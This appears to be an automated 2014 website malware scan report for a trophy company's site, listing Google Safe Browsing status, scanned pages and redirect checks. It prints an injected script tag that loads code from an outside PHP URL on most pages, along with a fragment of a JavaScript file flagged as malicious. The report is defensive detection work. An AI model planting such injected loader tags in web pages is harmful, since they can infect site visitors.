Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lltrophy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lltrophy.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 02:51:53 GMT Location: http://www.lltrophy.com/ Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: TS018c80b7=010bd78044f8972461589c43031cc50ceb9d627ce1c7040ffe2fd4f3b6e5c719bf0e725285; Path=/ | clean |
http://www.lltrophy.com/ | 200 OK Content-Length: 5363 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215006"></script> | ||
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
http://lltrophy.com/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 02:51:55 GMT Location: http://www.lltrophy.com/index.html Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: TS018c80b7=010bd78044c06e7b67a50b16f0e64256e843250ce70607be7815ed96eb065b8be8ea27ad73; Path=/ | clean |
http://www.lltrophy.com/index.html | 200 OK Content-Length: 5363 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215006"></script> | ||
http://www.lltrophy.com/industrial.html | 200 OK Content-Length: 9509 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215007"></script> | ||
http://www.lltrophy.com/res/clearbox.js?config=default | 200 OK Content-Length: 5557 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CB_Scripts = document.getElementsByTagName('script'); for(i=0;i<CB_Scripts.length;i++){ if (CB_Scripts[i].getAttribute('src')){ var q=CB_Scripts[i].getAttribute('src'); if(q.match('clearbox.js')){ var url = q.split('clearbox.js'); var path = url[0]; var query = url[1].substring(1); var pars = query.split('&'); for(j=0; j<pars.length; j++) { par = pars[j].split('='); switch(par[0]) { case 'c Antivirus reports:
| ||
http://www.lltrophy.com/schools.html | 200 OK Content-Length: 10211 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215010"></script> | ||
http://www.lltrophy.com/commercial.html | 200 OK Content-Length: 11105 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215002"></script> | ||
http://www.lltrophy.com/corporate.html | 200 OK Content-Length: 16902 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215004"></script> | ||
http://www.lltrophy.com/miscellaneous.html | 200 OK Content-Length: 10750 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215009"></script> | ||
http://www.lltrophy.com/slides/misc1.jpg | 200 OK Content-Length: 77930 Content-Type: image/jpeg | clean |
http://www.lltrophy.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.lltrophy.com/slides/misc2.jpg | 200 OK Content-Length: 73097 Content-Type: image/jpeg | clean |
http://www.lltrophy.com/slides/misc3.jpg | 200 OK Content-Length: 76352 Content-Type: image/jpeg | clean |
http://www.lltrophy.com/slides/misc4.jpg | 200 OK Content-Length: 93345 Content-Type: image/jpeg | clean |
http://www.lltrophy.com/slides/misc5.jpg | 200 OK Content-Length: 101182 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lltrophy.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Dec 2014 02:51:53 GMT
Location: http://www.lltrophy.com/
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TS018c80b7=010bd78044f8972461589c43031cc50ceb9d627ce1c7040ffe2fd4f3b6e5c719bf0e725285; Path=/
...232 bytes of data.
GET / HTTP/1.1
Host: lltrophy.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Dec 2014 02:51:53 GMT
Location: http://www.lltrophy.com/
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TS018c80b7=010bd78044f8972461589c43031cc50ceb9d627ce1c7040ffe2fd4f3b6e5c719bf0e725285; Path=/
...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lltrophy.com
Referer: http://www.google.com/search?q=lltrophy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lltrophy.com
Referer: http://www.google.com/search?q=lltrophy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.